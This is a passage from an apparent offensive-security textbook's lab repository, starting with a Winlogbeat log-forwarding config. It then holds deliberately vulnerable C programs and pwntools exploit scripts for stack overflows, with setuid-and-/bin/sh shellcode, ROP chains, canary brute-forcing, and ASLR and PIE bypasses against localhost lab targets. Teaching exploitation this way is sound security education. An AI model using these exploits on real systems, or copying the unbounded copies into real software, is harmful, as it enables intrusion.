it may be confusing to figure out where they are connecting from. If you would like to make this more
secure, you can limit the lab to your IP only by adding a line into the `terraform.tfvars` file that contains
allow list information like this:
`ip_allowlist = ["1.2.3.4/32","4.5.6.7/24"]`
================================================
FILE: ch08/winlogbeat.yml
================================================
# Example for the Beats on WEF server of DetectionLab
# Configuration version: 2021-05-31
# Derived from https://github.com/cyberdefenders/DetectionLabELK/blob/d3e22053f737883b0c8c42224967e976bb988863/Vagrant/scripts/install-winlogbeat.ps1
processors:
- script:
when.equals.winlog.channel: Security
lang: javascript
id: security
file: ${path.home}/module/security/config/winlogbeat-security.js
winlogbeat.event_logs:
- name: ForwardedEvents
ignore_older: 15m
- name: WEC-Authentication
- name: WEC-Code-Integrity
- name: WEC-EMET
- name: WEC-Powershell
- name: WEC-Process-Execution
- name: WEC-Services
- name: WEC-WMI
- name: WEC16-Test
- name: WEC2-Application-Crashes
- name: WEC2-Applocker
- name: WEC2-Group-Policy-Errors
- name: WEC2-Object-Manipulation
- name: WEC2-Registry
- name: WEC2-Task-Scheduler
- name: WEC2-Windows-Defender
- name: WEC3-Account-Management
- name: WEC3-Drivers
- name: WEC3-External-Devices
- name: WEC3-Firewall
- name: WEC3-Print
- name: WEC3-Smart-Card
- name: WEC3-Windows-Diagnostics
- name: WEC4-Bits-Client
- name: WEC4-DNS
- name: WEC4-Hotpatching-Errors
- name: WEC4-Shares
- name: WEC4-System-Time-Change
- name: WEC4-Windows-Updates
- name: WEC4-Wireless
- name: WEC5-Autoruns
- name: WEC5-Certificate-Authority
- name: WEC5-Crypto-API
- name: WEC5-Log-Deletion-Security
- name: WEC5-Log-Deletion-System
- name: WEC5-MSI-Packages
- name: WEC5-Operating-System
- name: WEC6-ADFS
- name: WEC6-Device-Guard
- name: WEC6-Duo-Security
- name: WEC6-Exploit-Guard
- name: WEC6-Microsoft-Office
- name: WEC6-Software-Restriction-Policies
- name: WEC6-Sysmon
processors:
- script:
lang: javascript
id: sysmon
file: ${path.home}/module/sysmon/config/winlogbeat-sysmon.js
- name: WEC7-Active-Directory
- name: WEC7-Privilege-Use
- name: WEC7-Terminal-Services
- name: Windows PowerShell
event_id: 400, 403, 600, 800
processors:
- script:
lang: javascript
id: powershell
file: ${path.home}/module/powershell/config/winlogbeat-powershell.js
- name: Microsoft-Windows-PowerShell/Operational
event_id: 4103, 4104, 4105, 4106
processors:
- script:
lang: javascript
id: powershell-operational
file: ${path.home}/module/powershell/config/winlogbeat-powershell.js
#setup.kibana:
# host: "192.168.38.105:5601"
# username: vagrant
# password: vagrant
#setup.dashboards.enabled: true
#setup.ilm.enabled: false
#output.elasticsearch:
# hosts: ["192.168.38.105:9200"]
#----------------------------- Kafka output --------------------------------
output.kafka:
# initial brokers for reading cluster metadata
# Place your HELK IP(s) here (keep the port).
# If you only have one Kafka instance (the HELK default), remove the second IP, the one with port 9093.
hosts: ["192.168.38.105:9092",]
topic: "winlogbeat"
############################# HELK Optimizing Latency ######################
max_retries: 2
max_message_bytes: 1000000
================================================
FILE: ch10/ch10_6_exploit.py
================================================
#!/usr/bin/env python3
#ch10_6_exploit.py
# Lab client for the ch10_6 target: a stack overflow delivered over the
# network.  Every number below is pinned to the lab build - the 264-byte
# filler, the hard-coded stack address and the 32-byte NOP sled only line up
# with a fixed stack layout (ASLR off) and no canary / NX on the target.
from pwn import *
context(bits=32, arch='i386')  # 32-bit target: p32() and the assembled shellcode depend on this
# Connect to vulnerable ch10_6 server
p = remote('localhost', 5555)
# findpeersh ( dup2(socket) + execve(/bin/sh) ) shellcode
shellcode = asm(shellcraft.findpeersh())
# Fixed guess at where the NOP sled lands on the target's stack; only
# meaningful for the lab's memory layout.
nopsled_address = p32(0xffffd418)
# Craft our payload: filler (presumably reaching the saved return address
# in the lab binary), the sled address, then the sled and the shellcode.
payload = b"A"*264
payload += nopsled_address
payload += b"\x90"*32
payload += shellcode
p.sendlineafter(b"Username: ", payload) # Send payload
p.interactive()
================================================
FILE: ch10/getenv.c
================================================
//getenv.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
    /* Prints the address of the SHELLCODE environment variable's value.
     * getenv() already returns a pointer past the "SHELLCODE=" prefix, so
     * adding strlen("SHELLCODE=") moves 10 bytes further into the value;
     * this offset is presumably intentional for the lab (smallbuff_exploit.py
     * reads this line) - confirm against the chapter text before changing it.
     * NOTE(review): "%08x" with a pointer argument assumes a 32-bit build
     * (the value is truncated on 64-bit), and a missing SHELLCODE variable
     * makes getenv() return NULL, which is then used in arithmetic. */
    printf("0x%08x\n", (getenv("SHELLCODE") + strlen("SHELLCODE=")));
    return 0;
}
================================================
FILE: ch10/meet.c
================================================
// meet.c
#include <stdio.h> // needed for screen printing
#include <string.h> // needed for strcpy
/* Greets the user: copies temp2 into a fixed 400-byte stack buffer and prints it.
 * temp1: title, printed as-is.  temp2: name, copied with strcpy().
 * strcpy() performs no bounds check, so a temp2 of 400 bytes or more runs past
 * name[] into the saved frame - this is the chapter's intentional bug (a bounded
 * copy such as snprintf(name, sizeof name, "%s", temp2) would prevent it).
 * The frame layout is what meet_exploit.py relies on, so the body is kept as-is. */
void greeting(char *temp1,char *temp2){ // greeting function to say hello
    char name[400]; // string variable to hold the name
    strcpy(name, temp2); // copy argument to name with the infamous strcpy
    printf("Hello %s %s\n", temp1, name); // print out the greeting
}
/* Entry point: argv[1] is the title, argv[2] the name.  There is no argc check,
 * so running with fewer than two arguments dereferences a NULL argv entry; the
 * check is deliberately absent here to keep the lab's stack layout unchanged. */
int main(int argc, char * argv[]){ // note the format for arguments
    greeting(argv[1], argv[2]); // call function, pass title & name
    printf("Bye %s %s\n", argv[1], argv[2]); // say "bye"
} // exit program
================================================
FILE: ch10/meet_exploit.py
================================================
#!/usr/bin/env python3
#meet_exploit.py
# Launches ./meet with a crafted second argument.  The 412-byte argument is
# NOP sled + shellcode + one address; the address is what ends up in
# greeting()'s saved return slot (name[400] plus the saved frame fields, per
# the lab).  Both the 412 total and 0xffffd224 are specific to the lab's
# build and to ASLR being disabled.
from pwn import *
context.update(arch='i386', os='linux')
# setuid(0) followed by the classic execve("/bin/sh") shellcode (same bytes as ch10/shellcode.c).
shellcode = b"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
sc_offset = p32(0xffffd224)  # fixed stack address that lands somewhere in the NOP sled
nops = b"\x90"*(412 - len(shellcode) - len(sc_offset))  # pad so the total is exactly 412 bytes
payload = nops + shellcode + sc_offset
p = process(["./meet", "Mr", payload])
p.interactive()
================================================
FILE: ch10/overflow.c
================================================
//overflow.c
#include <string.h>
/* Minimal overflow demonstration: 35 bytes are copied into a 10-byte buffer.
 * This is undefined behaviour (writes past str1 into whatever the compiler
 * placed next - typically the saved frame); it exists to be observed in a
 * debugger, not to be run in production.  A bounded copy (strncpy/snprintf
 * with sizeof str1) is the fix in real code. */
int main(){
    char str1[10]; //declare a 10 byte string
    //next, copy 35 bytes of "A" to str1
    strcpy (str1, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    return 0;
}
================================================
FILE: ch10/shellcode.c
================================================
#include <stdio.h>
#include <sys/mman.h>
/* setuid(0) followed by Aleph One's classic execve("/bin/sh") shellcode (see the
 * chapter's reference).  Declared const, so the compiler may put it in a
 * read-only section (main()'s comment says .data) - either way the page is not
 * executable until main() changes its protection. */
const char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() { //main function
    //The shellcode is on the .data segment,
    //we will use mprotect to make the page executable.
    // NOTE(review): the (int) cast keeps the full address only on a 32-bit
    // build; on 64-bit it truncates the pointer.  Only the single page that
    // contains the start of the array is remapped, and its return value is
    // not checked - if mprotect() fails, the call below faults instead of
    // running.  An RWX data page is exactly what W^X / NX policies prevent.
    mprotect(
        (void *)((int)shellcode & ~4095),
        4096,
        PROT_READ | PROT_WRITE | PROT_EXEC
    );
    //Convert the address of the shellcode variable to a function pointer,
    //allowing us to call it and execute the code.
    int (*ret)() = (int(*)())shellcode;
    return ret();
}
================================================
FILE: ch10/smallbuff.c
================================================
//smallbuff.c
#include <string.h>
/* Deliberately vulnerable lab program: argv[1] is copied into a 10-byte stack
 * buffer with no length check, so a longer argument overwrites the saved frame
 * (smallbuff_exploit.py sends 18 bytes of filler followed by an address).
 * No argc check either - running it without an argument passes NULL to strcpy.
 * Real code would bound the copy (snprintf(buff, sizeof buff, "%s", argv[1])). */
int main(int argc, char * argv[]){
    char buff[10]; //small buffer
    strcpy(buff, argv[1]); //vulnerable function call
    return 0;
}
================================================
FILE: ch10/smallbuff_exploit.py
================================================
#!/usr/bin/env python3
#smallbuf_exploit.py
# Runs ./smallbuff with an 18-byte filler followed by the address that
# ./getenv prints (where the SHELLCODE environment variable's value sits on
# the stack).  Relies on the environment being identical between the two
# processes and on ASLR being disabled; otherwise the address is meaningless.
from pwn import *
#Get SHELLCODE env
envp = process("./getenv")
shellcode_env = p32(int(envp.readline().strip(), 16))  # "0x........" line -> 4 little-endian bytes
envp.close()
payload = b"A"*18 + shellcode_env  # 18 = buff[10] plus the saved frame fields, per the lab
p = process(["./smallbuff", payload])
p.interactive()
================================================
FILE: ch11/README.md
================================================
The Kali version used at the time of writing was 2020.4 (GCC 10.2.0). Newer Kali/GCC versions break `exploit3.py` and `exploit4.py` because the stack canary validation now affects the rdx register.
Here we've provided:
* A `vuln` binary compiled on Kali 2020.4, so you can follow the same steps as the book on your own Kali version.
* A new working exploit (`exploit3-v2.py`) with a workaround for this problem. It should work on newer Kali versions (tested on Kali 2022.1 and Kali 2022.2).
================================================
FILE: ch11/exploit1.py
================================================
from pwn import *
# Lab 11-2: Bypassing Non-executable stack (NX) with Return Oriented Programming (ROP)
# gcc -no-pie vuln.c -o vuln
# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')  # 64-bit target: affects p64/u64 and ROP gadget search
# libc is assumed at a fixed base because the lab turns ASLR off
# (randomize_va_space = 0, see the comment above); with ASLR on this
# address is wrong on every run.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc.address = 0x00007ffff7def000
# Return-oriented chain built from libc only: point fds 0-2 at the client
# socket (fd 4 in the forked child, see ch11/vuln.c) and call
# system("/bin/sh").  No new code is injected, which is why NX alone does
# not stop it - the chapter's point.
rop = ROP(libc)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
rop.system(next(libc.search(b"/bin/sh")))
log.info(f"ROP Chain:\n{rop.dump()}")
r = remote("127.0.0.1", 4446, level='error')
# 120 bytes of filler reach the saved return address in auth() of the
# no-canary build (gcc -no-pie, see the comment above).
payload = b"A"*120
payload += bytes(rop)
# NOTE(review): the prompt is passed as str here; the other ch11 scripts use
# b"Password: ", which is what recent pwntools versions expect.
r.sendafter("Password: ", payload)
r.interactive()
================================================
FILE: ch11/exploit2.py
================================================
from pwn import *
# Lab 11-3: Defeating Stack Canaries
# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')  # 64-bit target: affects p64/u64/p8 packing and ROP gadget search
def exploit(payload: bytes, interactive: bool = False):
    """Send one payload to the lab server and report how it reacted.

    Opens a fresh connection per call (the server fork()s per client, see
    ch11/vuln.c), sends `payload` after the "Password: " prompt and returns
    True only if the reply received within 0.1 s starts with b"Invalid",
    i.e. the server's auth routine returned normally.  A closed connection
    (EOFError) yields False; any other outcome falls through to None, which
    is falsy.  With `interactive=True` the connection is handed to the user
    instead of being closed.
    """
    r = remote("127.0.0.1", 4446, level='error')
    r.sendafter(b"Password: ", payload)
    try:
        if r.recvrepeat(0.1)[:7] == b"Invalid":
            return True
    except EOFError:
        return False
    finally:
        # Runs on every path, including the early returns above.
        if interactive:
            r.interactive()
        else:
            r.close()
def leak_bytes(payload: bytes, name: str) -> bytes:
    """Recover the 8 unknown stack bytes that follow `payload`, one byte at a time.

    For each of the 8 positions every value 0..255 is appended and tried
    through exploit(); the first value that still yields the "Invalid" reply
    is kept and the search moves to the next byte.  This byte-at-a-time
    oracle only works because the forking server (ch11/vuln.c) gives every
    child the same stack contents; re-exec'ing per connection so each child
    gets a fresh canary and layout defeats it.  `name` is only used for
    logging.  Returns the 8 recovered bytes in memory (little-endian) order.
    """
    leaked_bytes = []
    progress = log.progress(name, level=logging.WARN)
    for _ in range(8):
        for i in range(256):
            if exploit(payload + p8(i)):
                payload += p8(i)
                # Prepend so the log shows the value most-significant byte first.
                leaked_bytes.insert(0, hex(i))
                progress.status(repr(leaked_bytes))
                break
    progress.success(repr(leaked_bytes))
    log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
    return payload[-8:]
# libc at a fixed base: the lab turns ASLR off (randomize_va_space = 0).
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc.address = 0x00007ffff7def000
# libc-only ROP chain: point fds 0-2 at the client socket (fd 4 in the
# forked child, see ch11/vuln.c) and call system("/bin/sh").
rop = ROP(libc)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
rop.system(next(libc.search(b"/bin/sh")))
log.info(f"ROP Chain:\n{rop.dump()}")
# Frame layout of auth() in the canary build, per the lab: 72 bytes of
# filler, then the canary (recovered byte-by-byte so the check still
# passes), then the saved rbp, then the chain.
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
payload += p64(0xBADC0FFEE0DDF00D) #SFP - saved rbp, any value works here
payload += bytes(rop)
exploit(payload, True)
================================================
FILE: ch11/exploit3-v2.py
================================================
from pwn import *
# Lab 11-4: ASLR bypass with an Information Leak
# gcc -no-pie -fstack-protector vuln.c -o vuln
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')  # 64-bit target: affects p64/u64/p8 packing and ROP gadget search
def exploit(payload: bytes, interactive: bool = False, leak: bool = False):
    """Send one payload to the lab server and report how it reacted.

    Opens a fresh connection per call (the server fork()s per client, see
    ch11/vuln.c) and sends `payload` after the "Password: " prompt.  With
    `leak=True` the next 8 bytes the server sends are returned as an int
    (the value written back by the stage-1 chain).  Otherwise returns True
    only if the reply received within 0.1 s starts with b"Invalid"; a closed
    connection (EOFError) yields False and anything else falls through to
    None.  With `interactive=True` the connection is handed to the user
    instead of being closed.
    """
    r = remote("127.0.0.1", 4446, level='error')
    r.sendafter(b"Password: ", payload)
    try:
        if leak:
            return u64(r.recv(8))
        if r.recvrepeat(0.1)[:7] == b"Invalid":
            return True
    except EOFError:
        return False
    finally:
        # Runs on every path, including the early returns above.
        if interactive:
            r.interactive()
        else:
            r.close()
def leak_bytes(payload: bytes, name: str) -> bytes:
    """Recover the 8 unknown stack bytes that follow `payload`, one byte at a time.

    For each of the 8 positions every value 0..255 is appended and tried
    through exploit(); the first value that still yields the "Invalid" reply
    is kept.  Works only because the forking server (ch11/vuln.c) gives every
    child the same stack contents; re-exec'ing per connection defeats it.
    `name` is only used for logging.  Returns the 8 bytes in memory order.
    """
    leaked_bytes = []
    progress = log.progress(name, level=logging.WARN)
    for _ in range(8):
        for i in range(256):
            if exploit(payload + p8(i)):
                payload += p8(i)
                # Prepend so the log shows the value most-significant byte first.
                leaked_bytes.insert(0, hex(i))
                progress.status(repr(leaked_bytes))
                break
    progress.success(repr(leaked_bytes))
    log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
    return payload[-8:]
# Two stages: stage 1 uses only the non-PIE binary (fixed addresses) to make
# the server write its own GOT entry for write() back to us; that reveals
# where libc was loaded this run (ASLR is on: randomize_va_space = 2).
# Stage 2 then builds the usual libc chain against that base.
elf = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
# Workaround for newer GCC (see ch11/README.md): the saved-rbp slot is pointed
# at a spot inside printf@plt so that the gadget below reads a harmless value
# from [rbp + 0x48] instead of faulting.
payload += p64(elf.plt.printf + 8) # 0x4010a8 <printf@plt+8>: 0xffffff70e9000000 <- [rbp + 0x48]
s1_rop = ROP(elf)
s1_rop.write(4, elf.got.write)
log.info(f"Stage 1 ROP Chain:\n{s1_rop.dump()}")
s1_payload = payload
s1_payload += p64(0x40123c) # adc edx, dword ptr [rbp + 0x48]; mov ebp, esp; call 0x11c0;
# mov byte ptr [rip + 0x2e83], 1; pop rbp; ret
s1_payload += p64(0xBADC0FEE0DDF00D)
s1_payload += bytes(s1_rop)
leaked_write = exploit(s1_payload, leak=True)
libc.address = leaked_write - libc.sym.write
log.info(f"libc_base == {hex(libc.address)}")
# Stage 2: same libc-only chain as the earlier labs (fd 4 is the client socket).
s2_rop = ROP(libc)
s2_rop.dup2(4, 0)
s2_rop.dup2(4, 1)
s2_rop.dup2(4, 2)
s2_rop.system(next(libc.search(b"/bin/sh")))
log.info(f"Stage 2 ROP Chain:\n{s2_rop.dump()}")
exploit(payload + bytes(s2_rop), interactive=True)
================================================
FILE: ch11/exploit3.py
================================================
from pwn import *
# Lab 11-4: ASLR bypass with an Information Leak
# gcc -no-pie -fstack-protector vuln.c -o vuln
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')  # 64-bit target: affects p64/u64/p8 packing and ROP gadget search
def exploit(payload: bytes, interactive: bool = False, leak: bool = False):
    """Send one payload to the lab server and report how it reacted.

    Opens a fresh connection per call (the server fork()s per client, see
    ch11/vuln.c) and sends `payload` after the "Password: " prompt.  With
    `leak=True` the next 8 bytes the server sends are returned as an int.
    Otherwise returns True only if the reply received within 0.1 s starts
    with b"Invalid"; a closed connection (EOFError) yields False and anything
    else falls through to None.  With `interactive=True` the connection is
    handed to the user instead of being closed.
    NOTE(review): the prompt is passed as str; exploit2.py and exploit3-v2.py
    use b"Password: ", which is what recent pwntools versions expect.
    """
    r = remote("127.0.0.1", 4446, level='error')
    r.sendafter("Password: ", payload)
    try:
        if leak:
            return u64(r.recv(8))
        if r.recvrepeat(0.1)[:7] == b"Invalid":
            return True
    except EOFError:
        return False
    finally:
        # Runs on every path, including the early returns above.
        if interactive:
            r.interactive()
        else:
            r.close()
def leak_bytes(payload: bytes, name: str) -> bytes:
    """Recover the 8 unknown stack bytes that follow `payload`, one byte at a time.

    For each of the 8 positions every value 0..255 is appended and tried
    through exploit(); the first value that still yields the "Invalid" reply
    is kept.  Works only because the forking server (ch11/vuln.c) gives every
    child the same stack contents; re-exec'ing per connection defeats it.
    `name` is only used for logging.  Returns the 8 bytes in memory order.
    """
    leaked_bytes = []
    progress = log.progress(name, level=logging.WARN)
    for _ in range(8):
        for i in range(256):
            if exploit(payload + p8(i)):
                payload += p8(i)
                # Prepend so the log shows the value most-significant byte first.
                leaked_bytes.insert(0, hex(i))
                progress.status(repr(leaked_bytes))
                break
    progress.success(repr(leaked_bytes))
    log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
    return payload[-8:]
# Two stages: stage 1 uses only the non-PIE binary (fixed addresses) to make
# the server write its own GOT entry for write() back to us, revealing where
# libc was loaded this run (ASLR is on: randomize_va_space = 2).  Stage 2
# builds the usual libc chain against that base.  ch11/README.md notes this
# version breaks on newer GCC; exploit3-v2.py carries the workaround.
elf = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
payload += p64(0xBADC0FEE0DDF00D) #SFP - saved rbp, any value works here
s1_rop = ROP(elf)
s1_rop.write(4, elf.got.write)
log.info(f"Stage 1 ROP Chain:\n{s1_rop.dump()}")
leaked_write = exploit(payload + bytes(s1_rop), leak=True)
libc.address = leaked_write - libc.sym.write
log.info(f"libc_base == {hex(libc.address)}")
# Stage 2: same libc-only chain as the earlier labs (fd 4 is the client socket).
s2_rop = ROP(libc)
s2_rop.dup2(4, 0)
s2_rop.dup2(4, 1)
s2_rop.dup2(4, 2)
s2_rop.system(next(libc.search(b"/bin/sh")))
log.info(f"Stage 2 ROP Chain:\n{s2_rop.dump()}")
exploit(payload + bytes(s2_rop), interactive=True)
================================================
FILE: ch11/exploit4.py
================================================
from pwn import *
# Lab 11-5: PIE bypass with an Information Leak
# gcc -fstack-protector vuln.c -o vuln
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
context(os='linux', arch='amd64')  # 64-bit target: affects p64/u64/p8 packing and ROP gadget search
def exploit(payload: bytes, interactive: bool = False, leak: bool = False):
    """Send one payload to the lab server and report how it reacted.

    Opens a fresh connection per call (the server fork()s per client, see
    ch11/vuln.c) and sends `payload` after the "Password: " prompt.  With
    `leak=True` the next 8 bytes the server sends are returned as an int.
    Otherwise returns True only if the reply received within 0.1 s starts
    with b"Invalid"; a closed connection (EOFError) yields False and anything
    else falls through to None.  With `interactive=True` the connection is
    handed to the user instead of being closed.
    NOTE(review): the prompt is passed as str; exploit2.py and exploit3-v2.py
    use b"Password: ", which is what recent pwntools versions expect.
    """
    r = remote("127.0.0.1", 4446, level='error')
    r.sendafter("Password: ", payload)
    try:
        if leak:
            return u64(r.recv(8))
        if r.recvrepeat(0.1)[:7] == b"Invalid":
            return True
    except EOFError:
        return False
    finally:
        # Runs on every path, including the early returns above.
        if interactive:
            r.interactive()
        else:
            r.close()
def leak_bytes(payload: bytes, name: str) -> bytes:
    """Recover the 8 unknown stack bytes that follow `payload`, one byte at a time.

    For each of the 8 positions every value 0..255 is appended and tried
    through exploit(); the first value that still yields the "Invalid" reply
    is kept.  Used here three times in a row (canary, saved rbp, return
    address).  Works only because the forking server (ch11/vuln.c) gives
    every child the same stack contents; re-exec'ing per connection defeats
    it.  `name` is only used for logging.  Returns the 8 bytes in memory order.
    """
    leaked_bytes = []
    progress = log.progress(name, level=logging.WARN)
    for _ in range(8):
        for i in range(256):
            if exploit(payload + p8(i)):
                payload += p8(i)
                # Prepend so the log shows the value most-significant byte first.
                leaked_bytes.insert(0, hex(i))
                progress.status(repr(leaked_bytes))
                break
    progress.success(repr(leaked_bytes))
    log.info(f"Leaked {name} = {hex(u64(payload[-8:]))}")
    return payload[-8:]
# PIE build: the binary's own load address is unknown too, so three 8-byte
# values are recovered in sequence - canary, saved rbp, and the saved return
# address into main.  The low byte of the return address is forced to 0x6d
# (the lab's known value; the search cannot distinguish it reliably because
# returning to that byte does not produce the "Invalid" reply) and the
# binary's base follows from the fixed offset 0x156d.
elf = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
payload = b"A"*72
payload += leak_bytes(payload, "Canary")
payload += leak_bytes(payload, "SFP")
leaked_rip = u64(p8(0x6d) + leak_bytes(payload, "RIP")[1:])
log.info(f"Fixed leaked_rip = {hex(leaked_rip)}")
elf.address = leaked_rip - 0x156d
log.info(f"elf.address = {hex(elf.address)}")
# Stage 1: make the server write its GOT entry for write() back to us, which
# gives the libc base; stage 2 is the usual libc chain (fd 4 is the client socket).
s1_rop = ROP(elf)
s1_rop.write(4, elf.got.write)
log.info(f"Stage 1 ROP Chain:\n{s1_rop.dump()}")
leaked_write = exploit(payload + bytes(s1_rop), leak=True)
libc.address = leaked_write - libc.sym.write
log.info(f"libc_base == {hex(libc.address)}")
s2_rop = ROP(libc)
s2_rop.dup2(4, 0)
s2_rop.dup2(4, 1)
s2_rop.dup2(4, 2)
s2_rop.system(next(libc.search(b"/bin/sh")))
log.info(f"Stage 2 ROP Chain:\n{s2_rop.dump()}")
exploit(payload + bytes(s2_rop), interactive=True)
================================================
FILE: ch11/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <errno.h>
#include <sys/wait.h>
#define BUFLEN 64
#define BIND_ADDRESS "127.0.0.1"
#define PORT 4446
/* Hard-coded plaintext credential, lab only: it sits in the binary's read-only
 * data and is trivially recoverable with strings(1). */
const char secret_pass[] = "Ultr4S3cr3tP4ssw0rd!";
/* Prompts for the password on connfd and returns 1 on a match, 0 otherwise.
 * Deliberately vulnerable: read() may store up to 512 bytes into the 64-byte
 * stack buffer (BUFLEN), so a long input overwrites the canary, saved rbp and
 * return address - this is the overflow the ch11 exploit scripts target.
 * A real implementation would pass sizeof(buf) - 1, check read()'s return
 * value and NUL-terminate buf before comparing it.  Note also that strncmp()
 * only compares strlen(secret_pass) bytes, so any input that merely starts
 * with the secret is accepted. */
int auth(int connfd) {
    char msg[] = "User Access Verification\n\nPassword: ";
    write(connfd, msg, strlen(msg));
    char buf[BUFLEN];
    read(connfd, buf, 512);
    return (strncmp(buf, secret_pass, strlen(secret_pass)) == 0);
}
/* Forking TCP server on BIND_ADDRESS:PORT.  Each accepted client is handled by
 * a fork()ed child that runs auth() and writes a one-line verdict.
 *
 * Because the children are forked without exec, every child has the same
 * stack canary and the same libc/binary mapping as the parent; that is what
 * lets a client recover those values one byte at a time by observing which
 * inputs crash the child.  Re-exec'ing per connection (or a non-forking
 * design) would give each connection fresh values.
 *
 * NOTE(review): the child never exits after answering - it falls back into
 * the loop and calls accept() on the sockfd it already closed, which fails
 * and reaches exit(-1).  It works, but by accident; an explicit exit after
 * the reply would be clearer. */
int main(void) {
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("socket() error...\n");
        return -1;
    }
    // SO_REUSEADDR so the listener can be restarted immediately while old connections linger.
    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){1}, sizeof(int)) == -1) {
        perror("setsockopt() error...\n");
        return -1;
    }
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(PORT);
    // INADDR_ANY is immediately overridden by inet_aton() below, so the
    // listener is bound to loopback only.
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    if (inet_aton(BIND_ADDRESS, &sa.sin_addr) == 0) {
        perror("Invalid address\n");
        close(sockfd);
        return -1;
    }
    if (bind(sockfd, (struct sockaddr*) &sa, sizeof(sa)) == -1) {
        printf("Can't bind on %s:%d.\n", BIND_ADDRESS, PORT);
        close(sockfd);
        return -1;
    }
    if (listen(sockfd, 1) == -1) {
        printf("error: %s\n", strerror(errno));
        close(sockfd);
        return -1;
    }
    printf("Listening on %s:%d\n", BIND_ADDRESS, PORT);
    struct sockaddr_in peer_addr;
    socklen_t addr_len = sizeof(peer_addr);
    int connfd;
    while(1) {
        // accept() returns fd 4 here (0-2 are stdio, 3 is sockfd); the
        // exploit scripts' dup2(4, ...) calls depend on that numbering.
        if ((connfd = accept(sockfd, (struct sockaddr*) &peer_addr, &addr_len)) < 0)
            exit(-1);
        pid_t pid = fork();
        if (pid == -1) {
            perror("fork");
            exit(0);
        }
        if (pid == 0) { //Child
            close(sockfd);
            if (auth(connfd) == 1) {
                char success[] = "Login Successful!";
                write(connfd, success, strlen(success));
            } else {
                // The client scripts key on the "Invalid" prefix of this reply.
                char invalid[] = "Invalid Pasword!";
                write(connfd, invalid, strlen(invalid));
            }
        } else if (pid > 0) { //parent
            close(connfd);
        }
    }
    return 0;
}
================================================
FILE: ch12/run1.sh
================================================
#!/bin/sh
# Boot the ch12 lab kernel (stack-protector-disabled build) under QEMU.
# -s opens the gdb stub on tcp:1234; -monitor /dev/null disables the QEMU monitor.
# The 9p share uses security_model=none (no credential mapping, attribute
# failures ignored) - acceptable only for a throwaway lab directory.
qemu=/usr/bin/qemu-system-x86_64
kernel=./stackprotector-disabled/bzImage
initrd=initramfs.cpio
shared=/home/kali/GHHv6/ch12/shared
cmdline="rw console=ttyS0 nokaslr quiet"

"$qemu" -m 64 -kernel "$kernel" -nographic -append "$cmdline" -initrd "$initrd" \
    -fsdev local,id=fs1,path="$shared",security_model=none \
    -device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
    -monitor /dev/null \
    -s
================================================
FILE: ch12/run2.sh
================================================
#!/bin/sh
# Boot the ch12 lab kernel (bzImage in this directory) under QEMU.
# -s opens the gdb stub on tcp:1234; -monitor /dev/null disables the QEMU monitor.
# The 9p share uses security_model=none (no credential mapping, attribute
# failures ignored) - acceptable only for a throwaway lab directory.
qemu=/usr/bin/qemu-system-x86_64
kernel=bzImage
initrd=initramfs.cpio
shared=/home/kali/GHHv6/ch12/shared
cmdline="rw console=ttyS0 nokaslr quiet"

"$qemu" -m 64 -kernel "$kernel" -nographic -append "$cmdline" -initrd "$initrd" \
    -fsdev local,id=fs1,path="$shared",security_model=none \
    -device virtio-9p-pci,fsdev=fs1,mount_tag=host-shared \
    -monitor /dev/null \
    -s
================================================
FILE: ch12/run3.sh
================================================
#!/bin/sh
# Boot the ch12 lab kernel under QEMU with SMEP exposed to the guest
# (-cpu kvm64,smep), so kernel-mode execution of user pages is blocked.
# -s opens the gdb stub on tcp:1234; -monitor /dev/null disables the QEMU monitor.
# The 9p share uses security_model=none (no credential mapping, attribute
# failures ignored) - acceptable only for a throwaway lab directory.
qemu=/usr/bin/qemu-system-x86_64
kernel=bzImage
initrd=initramfs.cpio
shared=/home/kali/GHHv6/ch12/shared
cmdline="rw console=ttyS0 nokaslr quiet"
cpu=kvm64,smep

"$qemu" -m 64 -kernel "$kernel" -nographic -append "$cmdline" -initrd "$initrd" \
